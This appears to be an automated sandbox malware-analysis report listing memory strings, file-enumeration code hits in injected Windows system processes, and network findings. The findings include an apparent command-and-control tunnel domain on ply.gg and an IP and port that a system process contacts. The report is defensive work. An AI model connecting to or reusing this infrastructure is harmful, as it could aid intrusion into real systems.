Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb* source: svchost.exe, 00000019.00000002.3526338299.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2239622970.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ~1.PDB @ source: svchost.exe, 00000019.00000000.2239543415.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.3524269971.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000019.00000000.2239439569.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000019.00000002.3523139455.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2239439569.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wct4B1.tmpp.pdb source: svchost.exe, 00000019.00000002.3526338299.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2239622970.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp

Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000001E85898DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	8_2_000001E85898DA18
Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000001E85898D894 FindFirstFileExW,	8_2_000001E85898D894
Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000001E8589BDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	8_2_000001E8589BDA18
Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000001E8589BD894 FindFirstFileExW,	8_2_000001E8589BD894
Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000001E8589EDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	8_2_000001E8589EDA18
Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000001E8589ED894 FindFirstFileExW,	8_2_000001E8589ED894
Source: C:\Windows\System32\lsass.exe	Code function: 9_2_00000140AE86D894 FindFirstFileExW,	9_2_00000140AE86D894
Source: C:\Windows\System32\lsass.exe	Code function: 9_2_00000140AE86DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	9_2_00000140AE86DA18
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_00000195DD5CD894 FindFirstFileExW,	12_2_00000195DD5CD894
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_00000195DD5CDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	12_2_00000195DD5CDA18
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_00000195DE1ADA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	12_2_00000195DE1ADA18
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_00000195DE1AD894 FindFirstFileExW,	12_2_00000195DE1AD894
Source: C:\Windows\System32\cmd.exe	Code function: 13_2_00000192913ED894 FindFirstFileExW,	13_2_00000192913ED894
Source: C:\Windows\System32\cmd.exe	Code function: 13_2_00000192913EDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	13_2_00000192913EDA18
Source: C:\Windows\System32\cmd.exe	Code function: 13_2_000001929162D894 FindFirstFileExW,	13_2_000001929162D894
Source: C:\Windows\System32\cmd.exe	Code function: 13_2_000001929162DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	13_2_000001929162DA18
Source: C:\Windows\System32\conhost.exe	Code function: 14_2_00000139F96DDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	14_2_00000139F96DDA18
Source: C:\Windows\System32\conhost.exe	Code function: 14_2_00000139F96DD894 FindFirstFileExW,	14_2_00000139F96DD894
Source: C:\Windows\System32\dwm.exe	Code function: 15_2_000001160CB3D894 FindFirstFileExW,	15_2_000001160CB3D894
Source: C:\Windows\System32\dwm.exe	Code function: 15_2_000001160CB3DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	15_2_000001160CB3DA18
Source: C:\Windows\System32\dwm.exe	Code function: 15_2_000001160CB9D894 FindFirstFileExW,	15_2_000001160CB9D894
Source: C:\Windows\System32\dwm.exe	Code function: 15_2_000001160CB9DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	15_2_000001160CB9DA18
Source: C:\Windows\System32\dwm.exe	Code function: 15_2_000001160CBCD894 FindFirstFileExW,	15_2_000001160CBCD894
Source: C:\Windows\System32\dwm.exe	Code function: 15_2_000001160CBCDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	15_2_000001160CBCDA18
Source: C:\Windows\System32\svchost.exe	Code function: 19_2_00000257E10AD894 FindFirstFileExW,	19_2_00000257E10AD894
Source: C:\Windows\System32\svchost.exe	Code function: 19_2_00000257E10ADA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	19_2_00000257E10ADA18
Source: C:\Windows\System32\svchost.exe	Code function: 19_2_00000257E10DD894 FindFirstFileExW,	19_2_00000257E10DD894
Source: C:\Windows\System32\svchost.exe	Code function: 19_2_00000257E10DDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	19_2_00000257E10DDA18
Source: C:\Windows\System32\svchost.exe	Code function: 20_2_000001428DD0DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	20_2_000001428DD0DA18
Source: C:\Windows\System32\svchost.exe	Code function: 20_2_000001428DD0D894 FindFirstFileExW,	20_2_000001428DD0D894
Source: C:\Windows\System32\svchost.exe	Code function: 20_2_000001428DD3DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	20_2_000001428DD3DA18
Source: C:\Windows\System32\svchost.exe	Code function: 20_2_000001428DD3D894 FindFirstFileExW,	20_2_000001428DD3D894
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_000001F28C93D894 FindFirstFileExW,	21_2_000001F28C93D894
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_000001F28C93DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	21_2_000001F28C93DA18
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_000001F28C96D894 FindFirstFileExW,	21_2_000001F28C96D894
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_000001F28C96DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	21_2_000001F28C96DA18
Source: C:\Windows\System32\svchost.exe	Code function: 22_2_000001CA9854D894 FindFirstFileExW,	22_2_000001CA9854D894
Source: C:\Windows\System32\svchost.exe	Code function: 22_2_000001CA9854DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	22_2_000001CA9854DA18
Source: C:\Windows\System32\svchost.exe	Code function: 23_2_000001D26531D894 FindFirstFileExW,	23_2_000001D26531D894
Source: C:\Windows\System32\svchost.exe	Code function: 23_2_000001D26531DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	23_2_000001D26531DA18
Source: C:\Windows\System32\svchost.exe	Code function: 23_2_000001D26534D894 FindFirstFileExW,	23_2_000001D26534D894
Source: C:\Windows\System32\svchost.exe	Code function: 23_2_000001D26534DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	23_2_000001D26534DA18
Source: C:\Windows\System32\svchost.exe	Code function: 24_2_00000254A2D4DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	24_2_00000254A2D4DA18
Source: C:\Windows\System32\svchost.exe	Code function: 24_2_00000254A2D4D894 FindFirstFileExW,	24_2_00000254A2D4D894
Source: C:\Windows\System32\svchost.exe	Code function: 25_2_0000024B87DDD894 FindFirstFileExW,	25_2_0000024B87DDD894
Source: C:\Windows\System32\svchost.exe	Code function: 25_2_0000024B87DDDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	25_2_0000024B87DDDA18
Source: C:\Windows\System32\svchost.exe	Code function: 25_2_0000024B8848DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	25_2_0000024B8848DA18
Source: C:\Windows\System32\svchost.exe	Code function: 25_2_0000024B8848D894 FindFirstFileExW,	25_2_0000024B8848D894
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_00000205FD40DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	26_2_00000205FD40DA18
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_00000205FD40D894 FindFirstFileExW,	26_2_00000205FD40D894
Source: C:\Windows\System32\svchost.exe	Code function: 29_2_000001A2056ADA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	29_2_000001A2056ADA18
Source: C:\Windows\System32\svchost.exe	Code function: 29_2_000001A2056AD894 FindFirstFileExW,	29_2_000001A2056AD894
Source: C:\Windows\System32\svchost.exe	Code function: 30_2_0000018EC1F6D894 FindFirstFileExW,	30_2_0000018EC1F6D894
Source: C:\Windows\System32\svchost.exe	Code function: 30_2_0000018EC1F6DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	30_2_0000018EC1F6DA18
Source: C:\Windows\System32\svchost.exe	Code function: 31_2_0000025CE3E0DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	31_2_0000025CE3E0DA18
Source: C:\Windows\System32\svchost.exe	Code function: 31_2_0000025CE3E0D894 FindFirstFileExW,	31_2_0000025CE3E0D894
Source: C:\Windows\System32\svchost.exe	Code function: 31_2_0000025CE417D894 FindFirstFileExW,	31_2_0000025CE417D894
Source: C:\Windows\System32\svchost.exe	Code function: 31_2_0000025CE417DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	31_2_0000025CE417DA18

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\svchost.exe

Domain query: capacity-sg.gl.at.ply.gg

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 147.185.221.24 ports 19465,1,4,5,6,9

Source: global traffic

TCP traffic: 192.168.2.5:49736 -> 147.185.221.24:19465

Source: Joe Sandbox View

IP Address: 147.185.221.24 147.185.221.24

Source: Joe Sandbox View

ASN Name: SALSGIVERUS SALSGIVERUS

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: capacity-sg.gl.at.ply.gg

Source: lsass.exe, 00000009.00000002.3545283451.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135334573.00000140AE074000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://3csp.icrosof4m/ocp0
Source: lsass.exe, 00000009.00000000.2135605557.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135420656.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135334573.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135138922.00000140AE000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3540727901.00000140AE000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3553913064.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: lsass.exe, 00000009.00000003.2240150691.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135420656.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135212496.00000140AE05A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000003.2607196609.00000140AE19E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: lsass.exe, 00000009.00000000.2134355094.00000140AD88B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
Source: lsass.exe, 00000009.00000002.3559749665.00000140AE208000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B
Source: lsass.exe, 00000009.00000002.3555641762.00000140AE1B7000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135605557.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000003.2186869203.00000140AE1B6000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135605557.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135420656.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135334573.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135138922.00000140AE000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3553913064.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
Source: svchost.exe, 00000014.00000000.2213030346.000001428A879000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.3601346126.000001428A879000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl.(
Source: svchost.exe, 00000014.00000000.2213030346.000001428A879000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.3601346126.000001428A879000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl.mi
Source: svchost.exe, 00000014.00000000.2213088609.000001428A88A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.3601746570.000001428A88A000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: lsass.exe, 00000009.00000000.2135605557.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135420656.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135334573.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135138922.00000140AE000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3540727901.00000140AE000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3553913064.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: lsass.exe, 00000009.00000003.2240150691.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135420656.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135212496.00000140AE05A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000003.2607196609.00000140AE19E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: lsass.exe, 00000009.00000002.3559749665.00000140AE208000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0
Source: lsass.exe, 00000009.00000000.2134355094.00000140AD88B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
Source: lsass.exe, 00000009.00000002.3555641762.00000140AE1B7000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135605557.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000003.2186869203.00000140AE1B6000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135605557.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135420656.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135334573.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135138922.00000140AE000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3553913064.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: lsass.exe, 00000009.00000003.2240150691.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135420656.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3549489785.00000140AE19E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000003.2607196609.00000140AE19E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: lsass.exe, 00000009.00000003.2240150691.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135420656.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135212496.00000140AE05A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000003.2607196609.00000140AE19E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: lsass.exe, 00000009.00000000.2134355094.00000140AD88B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
Source: lsass.exe, 00000009.00000002.3555641762.00000140AE1B7000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135605557.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000003.2186869203.00000140AE1B6000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135605557.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135420656.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135334573.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135138922.00000140AE000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3553913064.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: svchost.exe, 00000014.00000002.3606969024.000001428B117000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2350631269.0000024066840000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2350495308.0000024066821000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2350576370.000002406682A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.2479320958.0000024066840000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.2479104021.0000024066821000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.2479222787.000002406682A000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/
Source: lsass.exe, 00000009.00000002.3531354723.00000140AD88B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2134355094.00000140AD88B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: lsass.exe, 00000009.00000002.3531354723.00000140AD88B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2134355094.00000140AD88B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.2261094354.000001428A8E3000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000000.2212631582.000001428A813000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.3601346126.000001428A879000.00000004.00000001.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.20.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: svchost.exe, 00000014.00000002.3600184851.000001428A840000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab3D
Source: 57C8EDB95DF3F0AD4EE2DC2B8CFD4157.20.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
Source: svchost.exe, 00000014.00000002.3601346126.000001428A879000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cabIBi
Source: svchost.exe, 00000014.00000003.2261094354.000001428A8E3000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.3602584883.000001428A8DC000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.2263746615.000001428A8E4000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.3603497811.000001428A8F6000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000000.2212687583.000001428A82B000.00000004.00000001.00020000.00000000.sdmp, FB0D848F74F70BB2EAA93746D24D97491.20.dr, FB0D848F74F70BB2EAA93746D24D97490.20.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/pinrulesstl.cab
Source: svchost.exe, 00000014.00000002.3600184851.000001428A840000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/pinrulesstl.cab3D
Source: svchost.exe, 00000014.00000002.3607685052.000001428B138000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.3601746570.000001428A88A000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/pinrulesstl.cab?c645b6828f94f
Source: svchost.exe, 00000014.00000002.3608179611.000001428B14C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/pinrulesstl.cab?c645b6828f
Source: lsass.exe, 00000009.00000002.3527020051.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2134259713.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
Source: lsass.exe, 00000009.00000000.2134285461.00000140AD850000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3528269548.00000140AD850000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
Source: lsass.exe, 00000009.00000002.3527020051.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2134259713.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: svchost.exe, 00000014.00000000.2213030346.000001428A879000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000000.2213363373.000001428A8F6000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000000.2212687583.000001428A82B000.00000004.00000001.00020000.00000000.sdmp, E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB041.20.dr, E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A0.20.dr, E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB040.20.dr, E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB6151870.20.dr, 80237EE4964FC9C409AAF55BF996A292_C5130A0BDC8C859A2757D77746C10868.20.dr	String found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uN
Source: svchost.exe, 00000014.00000000.2213152446.000001428A8AF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8
Source: lsass.exe, 00000009.00000003.2240150691.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135605557.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2134355094.00000140AD88B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135420656.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135334573.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135138922.00000140AE000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135212496.00000140AE05A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3540727901.00000140AE000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000003.2607196609.00000140AE19E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3553913064.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3559749665.00000140AE208000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: lsass.exe, 00000009.00000003.2240150691.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135420656.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3549489785.00000140AE19E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000003.2607196609.00000140AE19E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: lsass.exe, 00000009.00000002.3555641762.00000140AE1B7000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135605557.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000003.2186869203.00000140AE1B6000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135605557.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135420656.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135334573.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135138922.00000140AE000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3553913064.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0I
Source: lsass.exe, 00000009.00000000.2135138922.00000140AE000000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.msocsp.
Source: lsass.exe, 00000009.00000003.2240150691.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135420656.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135334573.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3549489785.00000140AE19E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000003.2607196609.00000140AE19E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.msocsp.com0
Source: powershell.exe, 0000001C.00000002.3566116533.00000240B3632000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: svchost.exe, 0000001D.00000002.3545016604.000001A204EE0000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: lsass.exe, 00000009.00000002.3527020051.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2134259713.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
Source: lsass.exe, 00000009.00000002.3527020051.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2134259713.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: powershell.exe, 0000001C.00000002.3566116533.00000240B3361000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: lsass.exe, 00000009.00000000.2134285461.00000140AD850000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3527020051.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3528269548.00000140AD850000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2134259713.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
Source: lsass.exe, 00000009.00000000.2134259713.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: lsass.exe, 00000009.00000002.3527020051.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2134259713.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
Source: lsass.exe, 00000009.00000000.2134259713.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
